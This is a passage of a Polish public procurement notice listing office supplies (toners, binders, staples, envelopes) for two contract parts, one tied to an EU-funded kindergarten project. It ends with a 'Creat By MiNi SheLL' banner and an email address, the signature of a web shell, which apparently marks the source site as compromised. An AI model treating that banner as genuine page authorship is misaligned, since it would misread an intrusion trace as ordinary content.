28	Koperty dowodowe PU-D-7	szt.	1000;
29	Koperty dowodowe PU-D-8	szt.	400;
30	korektor w taśmie szerokość ok. 4,2 mm długość ok. 6 m	szt.	22;
31	Korektor w piórze płaskim z metalową końcówką poj. 12ml	szt.	44;
32	Koszulki na dokumenty A4 do wpinania PCV wiotkie pakowne po 100 szt.	opakowanie	104;
33	Koszulki na dokumenty A5 do wpinania (pakowane po 100 szt.)	opakowanie	12;
34	Marker niezmywalny czarny	szt.	35;
35	Markery wielokolorowe do płyt CD/DVD + wymazywacz	szt.	5;
36	marker biały olejowy grubość 2,2 mm	szt.	2;
37	Mysz optyczna PS2	szt.	10;
38	Mysz optyczna USB	szt.	5;
39	Niszczarka (sposób niszczenia- ścinki, niszczenie płyt- CD/DVD, spinacze zszywki, jednorazowo do 12 kartek, poziom bezpieczeństwa DIN3)	szt.	1;
40	Nota korygująca A5 wielokopia samokopiujący	blk	3;
41	Nożyczki biurowe 16 cm	szt.	3;
42	ołówek zwykły HB	szt.	11;
43	ofertówka sztywne A4 opakowanie po 25 szt.	opakowanie	42;
44	Papier kserograficzny A4 80g/m2 białość 161 w skali CIE (ryza po 500 arkuszy)  ,wilgotność 3,8-5,0 procentach,grubość 108 um, gładkość 180 cm3/min, ryza	695;
45	Pendrive 8GB	szt.	5;
46	Płyta 700MB CDRW pakowana pojedynczo opak. Slim	szt.	25;
47	Płyta 800MB CDR pakowana pojedynczo opak. Slim 	szt.	150;
48	Płyta DVD+R 4,7GB pakowana pojedynczo opak. SLIM	szt.	60;
49	Poduszka do stępli tradycyjnych - 110x70 mm -czerwona	szt.	5;
50	Pinezki tablicowe (op. 50 szt.)	opakowanie	3;
51	Pinezki (opak.po 50 szt. ) 	opakowanie	17;
52	Pióro automatyczne żelowe grubość linii pisania 0,5mm uchwyt antypoślizgowy w 4 podstawowych kolorach	szt.	12;
53	Rozszywacz	szt.	1;
54	Segregator wykonany z tektury na zewnątrz pokryty folią PCV. Mechanizm dźwigowy. Szerokość grzbietu 50mm A4	szt.	178;
55	Segregator wykonany z tektury na zewnątrz pokryty folią PCV. Mechanizm dźwigowy. Szerokość grzbietu 75mm A4	szt.	211;
56	Skoroszyt kartonowy A4 hakowy pełny gramatura 280	szt.	175;
57	Skoroszyt z PCV przedni okładka przezroczysta twarda, tylna kolorowa. Boczna perforacja umożliwiająca wpięcie do segregatora A4 (kolor: zielony, granat, czarny)	szt.	570;
58	Skoroszyt oczkowy ? A4 gramatura 280	szt.	140;
59	skoroszyt oczkowy A4 pełny biały z nadrukiem gramatura 280	szt.	270;
60	Skoroszyt kartonowy A4 pełny zwykły biały z nadrukiem gramatura 280	szt.	400;
61	składanka komputerowa 240mm/12 oryg/kopia (900)	pud.	3;
62	Spinacze biurowe owalne długość 28 mm (opakowanie 100 szt.)	szt.	125;
63	Spinacze biurowe owalne długość50 mm (opakowanie po 100szt.)	szt.	87;
64	Spinacze krzyżowe o długości 41 mm (opakowanie 50 szt.)	szt.	14;
65	Sprężone powietrze do czyszczenia komputera 400 ml	szt.	22;
66	Tablica korkowa  w ramie drewnianej (90x120mm)	szt.	3;
67	Taśma do drukarki igłowej OKI 390FB	szt.	10;
68	Taśma do drukarki OKI 6300FB	szt.	20;
69	Taśma dwustronna  50x10	szt.	21;
70	Taśma pakowa 55mm x 66m  wytrzymała na zerwanie przezroczysta	szt.	27;
71	Taśma samoprzylepna zwykła 18mmx20m	szt.	49;
72	Taśma samoprzylepna usuwalna (można po niej pisać)	szt.	4;
73	Taśma HP DDS - 4 40 GB (C5718A)	szt.	10;
74	Teczka biała wiązana bez nadruku szt.	szt.	590;
75	Teczka akt osobowych sztywny grzbiet oklejana trzy przegródki z opisem 	szt.	10;
76	Temperówka aluminiowa pojedyńcza	szt.	2;
77	Toner do drukarki HP 1102 oryginał	szt.	30;
78	Toner do drukarki HP 1515 czarny (oryginał)	szt.	4;
79	toner do drukarki HP 1566 oryginał 	szt.	17;
80	Toner do drukarki HP 1005 (oryginał)	szt.	2;
81	Toner do drukarki HP laser jet 1300 oryginał 	szt.	8;
82	Toner do drukarki laserowej HP Laser jet 1020 oryginał	szt.	8;
83	Toner do drukarki HP Laser jet 1010 oryginał 	szt.	8;
84	Toner do drukarki laserowej HP 1200 oryginał 	szt.	2;
85	Toner do drukarki HP laser jet 1100 oryginał	szt.	3;
86	Toner do drukarki HP laser jet P1505 oryginał	szt.	5;
87	Toner do drukarki laserowej HP 1018 oryginał	szt.	9;
88	Toner do drukarki HP 2840 oryginał  - czerwony	szt.	4;
89	Toner do drukarki HP 2840 oryginał  -niebieski	szt.	6;
90	Toner do drukarki HP 2840 oryginał  - żółty	szt.	5;
91	Toner do drukarki HP 2840 oryginał  - czarny	szt.	6;
92	Toner do kopiarki IR2230 (oryginał)	szt.	8;
93	Toner do kopiarki IR2018 oryginał 	szt.	3;
94	Toner do kopiarki IR16 oryginał 	szt.	2;
95	Toner Kyocera FS1128 oryginał	szt.	12;
96	Toner Kyocera Taskalfa 250ci oryginał czarny	szt.	4;
97	toner kyocera TAskalfa 250ci oryginał czerwony	szt.	3;
98	toner kyocera TAskalfa 250ci oryginał  żółty	szt.	3;
99	toner kyocera TAskalfa 250ci oryginał niebieski	szt.	3;
100	toner kyocera TK130 oryginał	szt.	3;
101	Toner do drukarki XEROX PHSSER 3010 oryginał	szt.	3;
102	Tusz czerwony do pieczątek	szt.	6;
103	Tusz czarny do pieczątek	szt.	1;
104	Wkład wymienny do długopisów żelowych czerwony grubość linii pisania 1700 	szt.	36;
105	Wkład wymienny do długopisów żelowych czarny. Grubość linii 0,3mm długość linii 900mm 	szt.	159;
106	Wkład zwykły niebieski z zaczepem dł. 10,8 cm 	szt.	70;
107	wkład typu ZENITH niebieski 	szt.	164;
108	wkład wymienny do długopisu kulkowego niebieski	szt.	10;
109	wkład wymienny do długopisu kulkowego czarny	szt.	10;
110	wniosek o wydanie dowodu osobistego D-1 , format A-4 blok 80 kartek	blok	19;
111	Umowa zlecenie wraz z rachunkami wielokopia A4 	blok	5;
112	Zakreślacz grubość linii 1-5mm zielony 	szt.	35;
113	Zakreślacz grubość linii 1-5mm żółty 	szt.	44;
114	Zeszyt A5 60 kartek w kratkę	szt.	12;
115	Zeszyt A4 w kratkę-twarda okładka 	szt.	47;
116	Zszywki 23/6 (pudełko po 1000szt.)	pudełko	15;
117	Zszywki 23/13 (pudełko po 1000szt.)	pudełko	3;
118	Zszywki 23/10 (pudełko po 1000szt.)	pudełko	4;
119	Zszywki 23/8 (pudełko po 1000szt.)	pudełko	5;
120	Zszywki 23/6/1/4 (pudełko po 1000szt.)	pudełko	4;
121	Zszywki 24/6 (pudełko po 1000szt.)	pudełko	120;
122	Zszywki 26/6 (pudełko po 1000szt.)	pudełko	28;
123	zszywki Nr 10 (pudełko po 1000szt.)	pudełko	7;
124	zszywacz do 25 kartek 24/6 i 26/6	szt.	15;
125	zszywacz do 100 kartek 	szt.	5;
126	zszywacz długoramienny do 15 kartek	szt.	2;
127	Zwrotne poświadczenie odbioru (na zasadach kpa)	szt.	10450;
128	Zwrotne poświadczenie odbioru (ordynacja podatkowa)	szt.	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZAKUP Z DOSTAWĄ ARTYKUŁÓW  BIUROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  Nr 2       

     ZAKUP Z DOSTAWĄ  MATERIAŁÓW BIUROWYCH NA POTRZEBY ZARZĄDZANIA PROJEKTEM  w ramach  projektu :Radosne przedszkole
 
Projekt pn: Radosne przedszkole   współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet: IX. Rozwój wykształcenia i kompetencji w regionach Działanie:9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty  Poddziałanie:  9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej realizowany na podstawie zawartej umowy z Województwem Łódzkim nr UDA - POKL 09.01.01-10-065/10-00 z 11.01.2011 r.
1	koszulki A4 po 100 szt	komplety	1 ;
2	koszulki A5 po 100 szt	komplety	1; 
3	ofertówka sztywna A4 po 25 szt	komplety	3 ;
4	rozszywacz	szt.	1;
5	płyta 700 MB CDRW	szt.	25;
6	poduszka do stempli tradycyjnych - czerwona	szt.	1;
7	dziurkacz do 65 kartek	szt.	1;
8	karteczki samoprzylepne kostka 75 mmx 75 mm	szt.	3;
9	segregator 75 mm A4	szt.	10;
10	skoroszyt z PCV A4	szt.	100;
11	toner do drukarki HP 1566	szt.	3;
12	zakreślacz grubość linii 1-5 mm zielony i żółty	szt.	4 po 2 z każdego koloru;
13	zszywki 23/13	szt.	3;
14	zszywki 26/6	szt.	9;
15	tusz czerwony do pieczątek	szt	2;
16	papier kserograficzny A4 80g/m2 białość 161 w skali CIE (ryza po 500 arkuszy)  	ryza	40;
17	kalkulator	szt.	2;
18	klipsy archiwalne	szt.	50;
19	markery wielokolorowe do płyt+wymazywacz	szt.	2;
20	zszywacz do 100 kartek	szt.	1;
21	zszywacz do 25 kartek	szt.	1;
22	długopis automatyczny kulkowy	szt.	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com